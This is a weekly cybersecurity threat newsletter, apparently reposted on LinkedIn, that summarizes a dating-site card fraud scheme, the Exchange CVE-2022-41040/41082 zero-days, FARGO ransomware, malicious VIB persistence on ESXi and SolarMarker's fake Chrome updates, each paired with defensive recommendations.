SISA Weekly Threat Watch
SISA Weekly Threat Watch?– our weekly feature brings to you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical threats.
ReasonLabs, a cybersecurity firm, has revealed a massive operation that allegedly stole millions of dollars from credit cards between 2019 to earlier this year. The fraudster’s plan includes running a large?false network?of dating websites with working customer service departments. Once the websites are operational, the con artists pressure the payment processors to provide?credit card acceptance. The scammers scan the?darknet?for thousands of stolen credit cards and purchase them before charging them for the services on their bogus website.
The scammers behind this scheme most likely employed?proxies?to build multiple fake dating websites. All the websites allude to the bogus domain?https://dateprofits[.]com?as an affiliate management program. As a best practice, all cardholders must review their?monthly billing statements?and immediately report any erroneous charges. No matter how little the charge may be, failing to notify it provides threat actors plenty of time to carry out their plans.
Microsoft has confirmed the existence of two recently discovered zero-day vulnerabilities in?Microsoft Exchange Server?2013, 2016, and 2019. Authentication to the exchange server is necessary to successfully exploit the?Server-Side Request Forgery (SSRF)?vulnerability CVE-2022-41040. On successful exploitation, it may be coupled with CVE-2022-41082 to enable?remote code execution (RCE)?using the?PowerShell Remoting Service.
With full user access coupled with the privileges attached to the account, the attacker can view, change, or delete data as well as create new accounts. The current mitigation is to add a?blocking rule?in “IIS Manager -> Default Web Site -> Autodiscover -> URL Rewrite -> Actions” to block the known attack patterns. Microsoft also suggests admins block the 5985/TCP and 5986/TCP?Remote PowerShell ports?to prevent attacks. It is also recommended to apply?automated patch management?to enterprise assets on a more frequent basis to update applications.
FARGO, like GlobeImposter, is a well-known ransomware that targets weak?MS-SQL servers. According to the researchers, the MS-SQL process on the compromised machine starts the ransomware infection by downloading a?.NET file?using cmd.exe and powershell.exe. Additional malware, including the locker, is retrieved by the payload, which then generates and executes a?BAT file?that shuts down services and processes.
领英推荐
The ransomware payload then attempts to delete the registry key for the open-source ransomware “vaccine” known as?Raccine?by injecting itself into AppLaunch.exe, a legitimate Windows process. The malware then creates the?ransom note?(named “RECOVERY FILES.txt”) and renames the locked files with the extension?“.Fargo3”. Using strong and unique passwords and keeping all the machines up to date with the latest security patches is essential to stay protected from such attacks.
Hackers have developed a new technique for establishing persistence on?VMware ESXi?hypervisors, allowing them to control virtual machines for?Windows?and?Linux?and?vCenter?servers covertly. The threat actor, identified as UNC3886, modified the acceptance level from “community” to “partner” in the?XML descriptor?for the VBI used in the attack to mislead anyone looking into it.
The attacker also used the?‘—force’ flag?to install the malicious VIBs. Using these methods, the threat actor infected the compromised ESXi server with the malware known as?VirtualPita?and?VirtualPie. These two malwares allow the execution of unrestricted commands, file uploads and downloads, and the starting and stopping of the logging system. To prevent systems from getting compromised, it is recommended to use?vCenter Single Sign-On?and consider decoupling ESXi and vCenter Servers from?Active Directory. Additionally, centralized logging of ESXi environments is also essential for both proactive detection of potential malicious behavior and event investigation.
The infamous SolarMarker threat actor group has declared its return and changed its attack strategy. In watering hole attacks, it is now using?fake Chrome browser updates?to distribute malware that steals information under the same name. These websites that are built using?open-source content management systems (CMS)?usually have security flaws and are therefore easy to compromise.
The SolarMarker hackers initially hired?SEO poisoning?to entice professionals and exploit code documents. However, the strategy of faking Chrome updates to mislead employees indicates that the attackers are trying a new way to spread their?data-stealing malware. Implementing appropriate endpoint monitoring and user awareness policies can help detect and prevent such threats. It is also recommended to avoid downloading files from?unknown websites?as even a seemingly harmless action like looking for a template or agreement form can lead to infection.
See you next week with more interesting cybersecurity bites!